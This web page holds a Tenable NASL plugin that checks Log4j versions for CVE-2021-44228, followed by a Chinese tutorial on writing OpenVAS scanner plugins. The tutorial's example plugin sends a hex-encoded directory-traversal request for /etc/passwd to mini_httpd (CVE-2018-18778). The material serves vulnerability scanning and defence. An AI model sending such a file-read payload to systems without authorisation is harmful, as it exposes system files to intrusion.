  • apache_log4j_win_2_15_0.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156002);
  script_version("1.13");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/23");

  script_cve_id("CVE-2021-44228");
  script_xref(name:"IAVA", value:"2021-A-0573");
  script_xref(name:"IAVA", value:"2021-A-0596");
  script_xref(name:"IAVA", value:"2021-A-0597");
  script_xref(name:"IAVA", value:"2021-A-0598");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2021/12/24");

  script_name(english:"Apache Log4j < 2.15.0 Remote Code Execution (Windows)");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.x < 2.15.0. It is, therefore, affected by a remote code execution
vulnerability in the JDNI parser due to improper log validation. An unauthenticated, remote attacker can exploit this
to bypass authentication and execute arbitrary commands. 

Log4j 1.x, which reached its End of Life prior to 2016, comes with JMSAppender which will perform a JNDI lookup if
enabled in Log4j's configuration file, hence customers should evaluate triggers in 1.x based on the risk that it is EOL
and whether JNDI lookups are enabled.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://github.com/apache/logging-log4j2/pull/608");
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.15.0 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"windows");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-44228");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/10");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_win_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j", "SMB/Registry/Enumerated");

  exit(0);
}

include('vcf.inc');

get_kb_item_or_exit('SMB/Registry/Enumerated');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app, win_local:TRUE);

if (app_info['JndiLookup.class association'] == 'Not Found')
  audit(AUDIT_OS_CONF_NOT_VULN, app, app_info.version);

var constraints = [{ 'min_version' : '2.0', 'fixed_version' : '2.15.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_HOLE
);

Nasl脚本如何编写

最近参与到一个漏扫项目当中,针对nessus和openvas比对后,发现基于openvas开发的扫描器更有优势,主要体现在openvas的命令行可以直接添加扫描ip、扫描方式和最后的报告导出,这就会帮助开发公司将openvas给集成到一个程序里,然后外面留一个ip的接口,通过ip来开启扫描任务,然后导出最后的扫描报告。openvas的插件一共是4.6w个,nessus则超过10万个,这里插件并不是越多越好,因为扫描时长其实也是考验扫描器的一个很重要的指标。

这里由于需要做后续插件库的维护和开发,因此去研究了下整个openvas的调用逻辑,下面就以mini-httpd作为示例,来讲解下我是怎么开发对应的poc插件的

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.100001");
  #漏洞的内部编号,这里其实是有命名规范的,用户可以修改的其实只有两位,这里可以参考openvas的官方nasl编写文档
  #我这里为了方便,只修改了最后一位,也就是100001
  script_version("$Revision: 11357 $");
  script_cve_id("CVE-2018-18778");
  #对应的cve编号
  script_bugtraq_id(99999);
  script_tag(name:"cvss_base", value:"9.3");
  #cvss分数,这里openvas在最后会输出高危中危低危,其实就是评估这个cvss分数,也就是说这个分数直接就决定了这个漏洞是高危还是中危
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
  #这里其实就是涉及到了一个Qod的分数,这个分数大意就是漏洞检测的质量,如果漏洞检测难度较大,那么可能这个分数就会低于60分,在最后输出报告时,默认会输出70分以上的漏洞
  #因此这里如果想要输出自编的插件漏洞,那么这里Qod分数尽量要高一点,上面这个模板分数大概就是99分
  script_tag(name:"last_modification", value:"$Date: 2018-10-22 12:57:05 +0200 (Wed, 12 Sep 2018) $");
  script_tag(name:"creation_date", value:"2018-10-22 16:21:31 +0100 (Fri, 16 Mar 2012)");
  script_name("mini_httpd");
  #漏洞名称
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2018 ADog");
  script_family("Backdoors");
  script_xref(name:"URL", value:"http://www.foreversong.cn/");

  script_tag(name:"impact", value:"由于没有过滤Http包头的特定字段,导致可以构造访问系统文件的路径,从而导致可访问任意文件,攻击者可以利用该漏洞读取设备的任意文件,这将严重威胁采用Mini_httpd的设备的安全性。");
  #漏洞影响
  script_tag(name:"affected", value:"mini_httpd");
  #影响范围
  script_tag(name:"insight", value:"mini_httpd_insight");
  script_tag(name:"solution", value:"下载最新ACME mini_httpd 1.3版本");
  #修复建议
  script_tag(name:"summary", value:"serious_bug");
  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

#漏洞检测
## Variable Initialization
port = 8080;
#mini_httpd默认端口

## Check Port status
if(!get_port_state(port)){
        #这里经过测试一些未开放的端口返回值都是1,如果开放的话返回值就是10000,所以这里其实就可以根据这个返回值做端口检测
	display("ADog:get_port_state failed.",port,"\n");
	exit(0);
}

## Open the socket
sock = open_sock_tcp(port);
if(!sock){
        #这里其实跟上面是一样的,sock端口其实都能开放的,所以这段可写可不写
	display("ADog:open_sock_tcp failed.",port,"\n");
	exit(0);
}

## Constructed directory traversal crafted request
req = raw_string(0x47, 0x45, 0x54, 0x20, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73, 0x77, 0x64, 0x20, 0x48, 0x54, 0x54, 0x50, 0x2f, 0x31, 0x2e, 0x31, 0x0d, 0x0a, 0x48, 0x6f, 0x73, 0x74, 0x3a, 0x20, 0x0d, 0x0a, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x4d, 0x61, 0x63, 0x69, 0x6e, 0x74, 0x6f, 0x73, 0x68, 0x3b, 0x20, 0x49, 0x6e, 0x74, 0x65, 0x6c, 0x20, 0x4d, 0x61, 0x63, 0x20, 0x4f, 0x53, 0x20, 0x58, 0x20, 0x31, 0x30, 0x2e, 0x31, 0x33, 0x3b, 0x20, 0x72, 0x76, 0x3a, 0x36, 0x33, 0x2e, 0x30, 0x29, 0x20, 0x47, 0x65, 0x63, 0x6b, 0x6f, 0x2f, 0x32, 0x30, 0x31, 0x30, 0x30, 0x31, 0x30, 0x31, 0x20, 0x46, 0x69, 0x72, 0x65, 0x66, 0x6f, 0x78, 0x2f, 0x36, 0x33, 0x2e, 0x30, 0x0d, 0x0a, 0x41, 0x63, 0x63, 0x65, 0x70, 0x74, 0x3a, 0x20, 0x74, 0x65, 0x78, 0x74, 0x2f, 0x68, 0x74, 0x6d, 0x6c, 0x2c, 0x61, 0x70, 0x70, 0x6c, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x2f, 0x78, 0x68, 0x74, 0x6d, 0x6c, 0x2b, 0x78, 0x6d, 0x6c, 0x2c, 0x61, 0x70, 0x70, 0x6c, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x2f, 0x78, 0x6d, 0x6c, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x39, 0x2c, 0x2a, 0x2f, 0x2a, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x38, 0x0d, 0x0a, 0x41, 0x63, 0x63, 0x65, 0x70, 0x74, 0x2d, 0x4c, 0x61, 0x6e, 0x67, 0x75, 0x61, 0x67, 0x65, 0x3a, 0x20, 0x7a, 0x68, 0x2d, 0x43, 0x4e, 0x2c, 0x7a, 0x68, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x38, 0x2c, 0x7a, 0x68, 0x2d, 0x54, 0x57, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x37, 0x2c, 0x7a, 0x68, 0x2d, 0x48, 0x4b, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x35, 0x2c, 0x65, 0x6e, 0x2d, 0x55, 0x53, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x33, 0x2c, 0x65, 0x6e, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x32, 0x0d, 0x0a, 0x43, 0x6f, 0x6e, 0x6e, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x3a, 0x20, 0x63, 0x6c, 0x6f, 0x73, 0x65, 0x0d, 0x0a, 0x55, 0x70, 0x67, 0x72, 0x61, 0x64, 0x65, 0x2d, 0x49, 0x6e, 0x73, 0x65, 0x63, 0x75, 0x72, 0x65, 0x2d, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x73, 0x3a, 0x20, 0x31, 0x0d, 0x0a, 0x0d, 0x0a);
#这里最重要的就是这段poc,由于这是web服务器,因此这的payload,读者可以对这段进行16进制解码,你就会发现其实就是一个web的流量包
#这里我先使用burp做了漏洞复现,然后将请求包复制下来,将其做了一次16进制转化
#这里openvas其实自带http的函数,但是这里我仍然使用了socket,原因就是如果后续不是web的服务,那么web相关的函数就用不了,总的来说socket肯定是最通用的方法

## send the attack request and recieve the response
display("ADog:port is working.",port,"\n");

send(socket:sock, data:req);
ret = recv(socket:sock, length:1024);
#获取返回包内容
close(sock);

#display("ADog:recv:",ret);

state = egrep(pattern:'^root.*',string:ret);
#openvas自带的匹配函数,这里用于匹配出现root字样,由于这个漏洞是任意文件读取,那么这里我读取的是/etc/passwd,那么就会第一条就会出现root用户的基本信息
#那么如果出现了,那么就认定此漏洞存在
#这里的定制化就体现在我们可以针对公司内部漏洞编写nasl脚本,其实仔细看过脚本的人就知道,目前市面上主流的扫描器其实都只是版本匹配,当然这也是为了无损扫描,也有部分payload是真的带poc

if(state)
{
  report = 'mini_httpd is vulnerable!\n';
  security_message(data:report);
  #这里使用openvas自带的报告函数将漏洞输出到扫描报告里
  #security_message(port:port);
  #这两个函数用一个就行了,一开始为了测试使用了这两个,最后报告里也就出现了两次
  display('mini_httpd is vulnerable.\n');
}

总的来说,web漏洞插件其实还是相对好写一点的,这里稍微讲下怎么使用openvas-nasl编译的,写完之后其实一开始是需要编译一下看看有没有语法错误的,这里的openvas-nasl是需要安装,不是自带工具

第一种不使用自带证书和签名,由于openvas的插件库都有签名和认证,你想要使用自编的插件库,openvas其实是不会调用的,所以这里需要首先对自己编写的插件库进行签名和认证。当然openvas-nasl也带了不使用认证来编译的参数,不过效果不是很好,自己测试的时候都没有收到回显。

第二种按照上面链接的流程对脚本进行签名后,既可以编译调用(这里签名很玄学,大概率会失败,失败原因千奇百怪)

openvas-nasl -p script.nasl

这里-p参数其实就是编译nasl脚本,如果有语法错误,就会输出语法错误

openvas-nasl -t 192.168.2.105 script.nasl

这个就是对某个ip进行测试,如果调用了openvas的自带函数,可能还需要使用-i参数来包含openvas的插件库目录

上面的display函数其实就类似于print函数,主要是为了调试方便。

最后给下我搭建环境使用的docker镜像(atomicorp/openvas)

© 版权声明
THE END
喜欢就支持一下吧
点赞35赞赏 分享
评论 抢沙发

请登录后发表评论